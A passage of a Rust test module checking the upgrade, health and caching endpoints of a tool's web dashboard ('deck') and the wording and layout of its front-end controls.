7570 std::env::remove_var(crate::updater::NO_AUTOUPDATE_ENV);
7571 }
7572 assert_eq!(res.status, 200, "not 202: nothing was set in motion");
7573 let body = res.json();
7574 assert!(body["to"].is_null(), "there was no release to move to");
7575 assert!(body["parked"].is_null(), "and nothing was parked");
7576 assert!(
7577 body["detail"]
7578 .as_str()
7579 .unwrap()
7580 .contains("disabled by MAGI_NO_AUTOUPDATE"),
7581 "{body:?}"
7582 );
7583 }
7584
7585 #[tokio::test]
7586 async fn an_upgrade_with_nothing_to_install_changes_nothing() {
7587 let repo = TempDir::new().expect("repo dir");
7603 std::fs::write(repo.path().join("magi.toml"), "[update]\nmode = \"off\"\n")
7604 .expect("write magi.toml");
7605 let fx = Fixture::with_repo(repo.path().to_path_buf()).await;
7606
7607 let res = fx.post("/api/upgrade", None).await;
7613 assert_eq!(res.status, 200, "not 202: nothing was set in motion");
7614 let body = res.json();
7615 assert!(body["to"].is_null(), "there was no release to move to");
7616 assert!(body["parked"].is_null(), "and nothing was parked");
7617 assert!(
7618 body["detail"]
7619 .as_str()
7620 .unwrap()
7621 .contains("nothing restarted"),
7622 "{body:?}"
7623 );
7624 }
7625
7626 #[tokio::test]
7627 async fn health_reports_the_running_version_and_no_pending_upgrade_by_default() {
7628 let repo = TempDir::new().expect("repo dir");
7633 std::fs::write(repo.path().join("magi.toml"), "[update]\nmode = \"off\"\n")
7634 .expect("write magi.toml");
7635 let fx = Fixture::with_repo(repo.path().to_path_buf()).await;
7636
7637 let health = fx.get("/api/health").await.json();
7638 assert_eq!(health["version"], env!("CARGO_PKG_VERSION"));
7639 assert_eq!(
7640 health["update"]["available"], false,
7641 "checking is off, which reads as \"unknown\", not \"none\""
7642 );
7643 assert!(health["update"]["to"].is_null());
7644 assert!(
7645 health["upgrade"].is_null(),
7646 "nothing has ever asked this deck to upgrade"
7647 );
7648 }
7649
7650 #[tokio::test]
7651 async fn health_reports_a_parked_upgrade_and_what_it_is_waiting_on() {
7652 let fx = Fixture::start().await;
7653 write_run(&fx.runs(), "20260905-000000-cd51", RunStatus::Implementing);
7654
7655 let mut progress = crate::updater::Progress::new("0.5.1".to_owned(), "0.5.2".to_owned());
7656 progress.parked_run = Some("20260905-000000-cd51".to_owned());
7657 progress.advance(crate::updater::Stage::Parking);
7658 crate::updater::write_progress(fx.home.path(), &progress).expect("write upgrade.json");
7659
7660 let health = fx.get("/api/health").await.json();
7661 assert_eq!(health["upgrade"]["stage"], "parking");
7662 assert_eq!(health["upgrade"]["from"], "0.5.1");
7663 assert_eq!(health["upgrade"]["to"], "0.5.2");
7664 let waiting_on = health["upgrade"]["waiting_on"]
7665 .as_str()
7666 .expect("waiting_on is set while parking a known run");
7667 assert!(waiting_on.contains("cd51"), "{waiting_on}");
7668 assert!(waiting_on.contains("implementing"), "{waiting_on}");
7669 }
7670
7671 #[tokio::test]
7672 async fn health_reports_a_finished_upgrade_with_no_waiting_on() {
7673 let fx = Fixture::start().await;
7674 let mut progress = crate::updater::Progress::new("0.5.1".to_owned(), "0.5.2".to_owned());
7675 progress.advance(crate::updater::Stage::Done);
7676 crate::updater::write_progress(fx.home.path(), &progress).expect("write upgrade.json");
7677
7678 let health = fx.get("/api/health").await.json();
7679 assert_eq!(health["upgrade"]["stage"], "done");
7680 assert!(
7681 health["upgrade"]["waiting_on"].is_null(),
7682 "nothing to wait on once it is done"
7683 );
7684 }
7685
7686 #[tokio::test]
7687 async fn hand_over_advances_the_upgrade_progress_through_parking_and_restarting() {
7688 let home = TempDir::new().expect("temp home");
7689 let runs = home.path().join("runs");
7690 std::fs::create_dir_all(&runs).expect("runs dir");
7691 let ui = Ui::new(
7692 Queue::at(home.path().join("queue")),
7693 Questions::at(home.path().join("questions")),
7694 Talks::at(home.path().join("talks")),
7695 runs,
7696 home.path().to_path_buf(),
7697 PathBuf::from("/repo/magi"),
7698 )
7699 .with_launch(launch_idle);
7700 let looping = ui.looping();
7701 let listener = tokio::net::TcpListener::bind((Ipv4Addr::LOCALHOST, 0))
7702 .await
7703 .expect("bind loopback");
7704 let served = tokio::spawn(axum::serve(listener, ui.router()).into_future());
7705
7706 let progress = crate::updater::Progress::new("0.5.1".to_owned(), "0.5.2".to_owned());
7707 crate::updater::write_progress(home.path(), &progress).expect("seed progress");
7708
7709 hand_over(home.path(), &looping, served, || Ok(()))
7710 .await
7711 .expect("hand over");
7712
7713 let after = crate::updater::read_progress(home.path()).expect("progress on disk");
7714 assert_eq!(
7715 after.stage,
7716 crate::updater::Stage::Restarting,
7717 "hand_over owns the record through parking and up to restarting; \
7718 the successor is what finishes it"
7719 );
7720 }
7721
7722 #[test]
7723 fn the_upgrade_button_arms_before_it_restarts_anything() {
7724 assert!(APP_JS.contains("upgrade: \"/api/upgrade\""));
7727 assert!(APP_JS.contains("Replace the binary and restart?"));
7728 assert!(APP_JS.contains("function confirmed("));
7729 assert!(APP_JS.contains("show(upgradeBtn, !foreign && update.available)"));
7734 assert!(
7738 APP_JS.contains("Parking, then restarting"),
7739 "the button says what it is waiting for"
7740 );
7741 assert!(APP_JS.contains("if (!out.to)"));
7744 }
7745
7746 #[test]
7747 fn the_running_version_is_shown_regardless_of_whether_an_update_exists() {
7748 assert!(
7749 APP_JS.contains("state.health.version"),
7750 "the operator wants to know what is running even with nothing newer"
7751 );
7752 assert!(APP_JS.contains("id=\"daemon-version\"") || APP_CSS.contains(".daemon-version"));
7753 }
7754
7755 #[test]
7756 fn the_upgrade_button_names_its_destination() {
7757 assert!(
7758 APP_JS.contains("`Update to ${update.to}`"),
7759 "pressing the button should not be a surprise about what it moves to"
7760 );
7761 }
7762
7763 #[test]
7764 fn an_upgrade_in_progress_is_shown_as_stages_not_as_an_error() {
7765 for stage in ["downloading", "replaced", "parking", "restarting"] {
7766 assert!(
7767 APP_JS.contains(&format!("\"{stage}\"")),
7768 "the phone must be able to tell {stage} apart from the others"
7769 );
7770 }
7771 assert!(APP_JS.contains(".waiting_on"));
7772 assert!(APP_JS.contains("function reportUnreachableDuringUpgrade("));
7777 assert!(APP_JS.contains("reconnects on its own"));
7778 }
7779
7780 #[test]
7781 fn a_failed_upgrade_does_not_lock_the_loop_controls() {
7782 let body = &APP_JS[APP_JS.find("function renderLoop(").expect("renderLoop")
7791 ..APP_JS.find("function upgrade(").expect("upgrade")];
7792 assert!(
7793 !body.contains(
7794 "upgradeStage === \"failed\") {\n setAttr(box, \"data-state\", \"failed\")"
7795 ),
7796 "a failed upgrade must not take the whole strip over the way it used to"
7797 );
7798 assert!(
7799 body.contains("upgradeFailNote"),
7800 "the failure has to reach the loop's own note instead"
7801 );
7802 assert_eq!(
7806 body.matches("upgradeFailNote].filter(Boolean).join")
7807 .count(),
7808 2,
7809 "both loop-why writers (quiet and control) must fold the note in"
7810 );
7811 }
7812
7813 #[test]
7814 fn an_overdue_upgrade_eventually_asks_for_a_human() {
7815 assert!(APP_JS.contains("UPGRADE_WAIT_LIMIT_MS = 70 * 60 * 1000"));
7818 assert!(APP_JS.contains("function upgradeOverdue("));
7819 }
7820
7821 #[test]
7822 fn coming_back_from_an_upgrade_says_which_version_it_landed_on() {
7823 assert!(
7824 APP_JS.contains("Updated to ${upgradeInfo.to"),
7825 "the operator who asked for the restart wants to know it worked"
7826 );
7827 }
7828
7829 #[test]
7830 fn an_error_is_visible_from_where_the_button_is() {
7831 let alert = &APP_CSS[APP_CSS.find(".alert {").expect(".alert")
7836 ..APP_CSS.find(".alert-text").expect(".alert-text")];
7837 assert!(
7838 alert.contains("position: fixed"),
7839 "an error about the thing under your thumb has to be visible from \
7840 where your thumb is: {alert}"
7841 );
7842 assert!(
7843 alert.contains("z-index: 25"),
7844 "above the dock (20) and the run-actions FAB (15), so neither \
7845 buries it: {alert}"
7846 );
7847 assert!(
7848 alert.contains("var(--tap)"),
7849 "and clear of the dock and the home indicator: {alert}"
7850 );
7851 assert!(
7854 alert.contains("var(--s4) + var(--tap) + var(--s3)"),
7855 "the FAB's column stays free: {alert}"
7856 );
7857 }
7858
7859 #[tokio::test]
7860 async fn an_older_attempt_says_what_replaced_it() {
7861 let fx = Fixture::start().await;
7862 let q = fx.queue();
7863 let runs = fx.runs();
7864 let (first, second) = ("20260901-000000-aaaa", "20260901-000000-bbbb");
7865 write_run(&runs, first, RunStatus::Stalled);
7866 write_run(&runs, second, RunStatus::Blocked);
7867
7868 let mut t = Task::new(
7869 "one task".to_owned(),
7870 "do it".to_owned(),
7871 PathBuf::from("/repo"),
7872 Source::Human,
7873 );
7874 t.runs = vec![first.to_owned(), second.to_owned()];
7875 q.put(&mut t).expect("put");
7876
7877 let rows = fx.get("/api/runs").await.json();
7881 let by = |short: &str| -> Value {
7882 rows.as_array()
7883 .unwrap()
7884 .iter()
7885 .find(|r| r["short"] == short)
7886 .cloned()
7887 .unwrap_or(Value::Null)
7888 };
7889 assert_eq!(by("aaaa")["superseded_by"], "bbbb");
7890 assert!(
7891 by("bbbb")["superseded_by"].is_null(),
7892 "the latest attempt is not superseded by anything"
7893 );
7894 assert!(APP_JS.contains("run.superseded_by"));
7896 assert!(APP_JS.contains("Superseded by"));
7897 }
7898
7899 #[tokio::test]
7900 async fn a_replaced_deck_is_not_served_from_a_phone_s_cache() {
7901 let fx = Fixture::start().await;
7902 let js = fx.get("/app.js").await;
7908 assert_eq!(js.status, 200);
7909 let tag = js
7910 .header("etag")
7911 .expect("an etag to revalidate against")
7912 .to_owned();
7913 assert!(tag.contains(env!("CARGO_PKG_VERSION")), "tag: {tag}");
7914 assert_eq!(
7915 js.header("cache-control"),
7916 Some("no-cache, must-revalidate"),
7917 "the phone has to ask every time"
7918 );
7919
7920 let again = fx
7923 .get_with("/app.js", &[("if-none-match", tag.as_str())])
7924 .await;
7925 assert_eq!(
7926 again.status, 304,
7927 "a deck it already has costs one round trip"
7928 );
7929 assert!(again.body.is_empty(), "304 carries no body");
7930
7931 let weak = fx
7934 .get_with("/app.js", &[("if-none-match", &format!("W/{tag}"))])
7935 .await;
7936 assert_eq!(weak.status, 304);
7937 let stale = fx
7938 .get_with("/app.js", &[("if-none-match", "\"0.0.1-1\"")])
7939 .await;
7940 assert_eq!(stale.status, 200, "an older build must be replaced");
7941 assert!(stale.body.contains("renderRunActions"));
7942 }
7943
7944 #[test]
7945 fn the_deck_never_sends_the_operator_to_a_terminal() {
7946 assert!(
7949 !APP_JS.contains("Run `magi fold` first"),
7950 "the deck must offer the fold, not prescribe a shell command"
7951 );
7952 assert!(APP_JS.contains("foldRun:"));
7953 assert!(APP_JS.contains("resumeRun:"));
7954 assert!(APP_JS.contains("renderRunActions"));
7955
7956 assert!(APP_JS.contains("armedFold"));
7958 assert!(APP_JS.contains("Yes, fold worktrees"));
7959
7960 assert!(APP_JS.contains("can no longer be resumed"));
7963 }
7964
7965 #[test]
7966 fn a_finished_run_explains_itself_with_its_own_last_line() {
7967 assert!(
7973 !APP_JS.contains("collapsed on agent quota"),
7974 "a stall must not be explained by a cause the deck did not check"
7975 );
7976 assert!(
7977 !APP_JS.contains("Review rounds ran out with findings still open, or the gate failed"),
7978 "and a block must not offer a guess with an `or` in it"
7979 );
7980
7981 assert!(
7985 APP_JS.contains("setText(r.event, run.event || \"\")"),
7986 "the run's last line is rendered unconditionally"
7987 );
7988 assert!(
7989 !APP_JS.contains("moving && run.event"),
7990 "and never gated on the run still moving"
7991 );
7992
7993 assert!(APP_JS.contains("lost to quota"));
7995 }
7996
7997 #[test]
8019 fn runs_tree_sections_and_state_chips_agree_on_what_a_run_can_be() {
8020 let shapes_marker = "const REPRESENTATIVE_RUN_SHAPES = [";
8021 let shapes_body_start =
8022 APP_JS.find(shapes_marker).expect("the shape list exists") + shapes_marker.len();
8023 let shapes_close = APP_JS[shapes_body_start..]
8024 .find("].map(")
8025 .expect("the shape list is closed by its done-computing .map(...)")
8026 + shapes_body_start;
8027 let shapes_src = &APP_JS[shapes_body_start..shapes_close];
8028
8029 let mut shapes: Vec<(bool, String)> = Vec::new();
8030 for entry in shapes_src.split('{').skip(1) {
8031 let waiting = entry.contains("waiting: true");
8032 let status_at =
8033 entry.find("status: \"").expect("each shape names a status") + "status: \"".len();
8034 let status_end = entry[status_at..]
8035 .find('"')
8036 .expect("the status string is closed")
8037 + status_at;
8038 shapes.push((waiting, entry[status_at..status_end].to_string()));
8039 }
8040 assert!(shapes.len() >= 6, "parsed shapes: {shapes:?}");
8041
8042 let done_rule_marker = "done: !";
8046 let done_rule_at = APP_JS[shapes_close..]
8047 .find(done_rule_marker)
8048 .expect("the done rule follows the shape list")
8049 + shapes_close
8050 + done_rule_marker.len();
8051 let includes_at = APP_JS[done_rule_at..]
8052 .find(".includes(shape.status)")
8053 .expect("the done rule ends in .includes(shape.status)")
8054 + done_rule_at;
8055 let not_done: Vec<&str> = APP_JS[done_rule_at..includes_at]
8056 .trim()
8057 .trim_start_matches('[')
8058 .trim_end_matches(']')
8059 .split(',')
8060 .map(|s| s.trim().trim_matches('"'))
8061 .filter(|s| !s.is_empty())
8062 .collect();
8063
8064 let shapes: Vec<(bool, String, bool)> = shapes
8065 .into_iter()
8066 .map(|(waiting, status)| {
8067 let done = !not_done.contains(&status.as_str());
8068 (waiting, status, done)
8069 })
8070 .collect();
8071
8072 fn run_section(waiting: bool, status: &str) -> &'static str {
8076 if waiting {
8077 return "waiting";
8078 }
8079 match status {
8080 "merged" | "ready" => "landed",
8081 "stalled" | "blocked" | "failed" => "ended",
8082 _ => "flight",
8083 }
8084 }
8085
8086 fn filter_matches(filter_key: &str, waiting: bool, done: bool) -> bool {
8089 match filter_key {
8090 "active" => !done,
8091 "flight" => !done && !waiting,
8092 "waiting" => waiting,
8093 "done" => done,
8094 "all" => true,
8095 other => panic!("unknown RUN_STATE_FILTERS key: {other}"),
8096 }
8097 }
8098
8099 let compatible = |section: &str, filter_key: &str| {
8100 shapes.iter().any(|(waiting, status, done)| {
8101 run_section(*waiting, status) == section
8102 && filter_matches(filter_key, *waiting, *done)
8103 })
8104 };
8105
8106 let expected = [
8111 ("waiting", [true, false, true, true, true]),
8112 ("flight", [true, true, false, false, true]),
8113 ("landed", [false, false, false, true, true]),
8114 ("ended", [false, false, false, true, true]),
8115 ];
8116 let filter_keys = ["active", "flight", "waiting", "done", "all"];
8117
8118 for (section, wants) in expected {
8119 for (filter_key, want) in filter_keys.iter().zip(wants) {
8120 assert_eq!(
8121 compatible(section, filter_key),
8122 want,
8123 "section {section:?} x filter {filter_key:?} should be compatible: {want}"
8124 );
8125 }
8126 }
8127
8128 assert!(
8131 APP_JS.contains("function sectionCompatibleWithStateFilter(sectionKey, filterKey)")
8132 );
8133 assert!(APP_JS.contains(
8134 "if (state.runsFilter.section && !sectionCompatibleWithStateFilter(state.runsFilter.section, key))"
8135 ));
8136 assert!(APP_JS.contains(
8137 "if (!same && !sectionCompatibleWithStateFilter(section, state.runsStateFilter))"
8138 ));
8139 }
8140}